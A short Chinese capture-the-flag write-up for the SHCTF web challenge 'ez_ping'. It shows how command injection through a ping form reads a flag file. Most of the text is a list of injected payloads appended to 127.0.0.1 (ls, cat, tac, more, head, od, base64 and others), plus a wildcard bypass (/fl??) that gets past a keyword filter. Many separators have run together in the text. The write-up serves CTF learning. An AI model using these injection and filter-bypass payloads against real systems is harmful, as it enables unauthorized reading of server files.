【CTF-WEB-命令行指令】ping+地址后面带上命令行指令:127.0.0.1 more /fl??

【CTF-WEB-命令行指令】ping+地址后面带上命令行指令:127.0.0.1  more /fl??
题目第三届 SHCTF 公开赛道 - web - ez_ping域名测试系统中真的只能测试域名吗我不相信解题思路打开网页测试功能127.0.0.1测试后缀查询当前目录我测试了127.0.0.1|dir127.0.0.1|ls127.0.0.1dir127.0.0.1ls127.0.0.1dir127.0.0.1ls发现最后一种情况出现了一些特殊信息index.phpping.php查看上一层127.0.0.1ls/发现了flag文件/文件夹尝试获取flag直接读取文件127.0.0.1cat/flag使用tac反向读取可能绕过一些限制127.0.0.1tac/flag使用more分页读取127.0.0.1more/flag使用less读取127.0.0.1less/flag使用head读取前几行127.0.0.1head-n20/flag使用tail读取后几行127.0.0.1tail-n20/flag使用strings提取可打印字符127.0.0.1strings /flag使用grep搜索特定内容127.0.0.1grep-r./flag使用od八进制/十六进制转储适合二进制文件127.0.0.1od-c/flag使用base64编码输出适合特殊字符127.0.0.1base64 /flag将flag换成fl??上述方法都没有成功随机尝试把flag换成fl**和fl??发现fl??成功了127.0.0.1more/fl??127.0.0.1head-n20/fl??答案SHCTF{92fc8e4f-a36d-43a9-a8c4-00d778286f4a}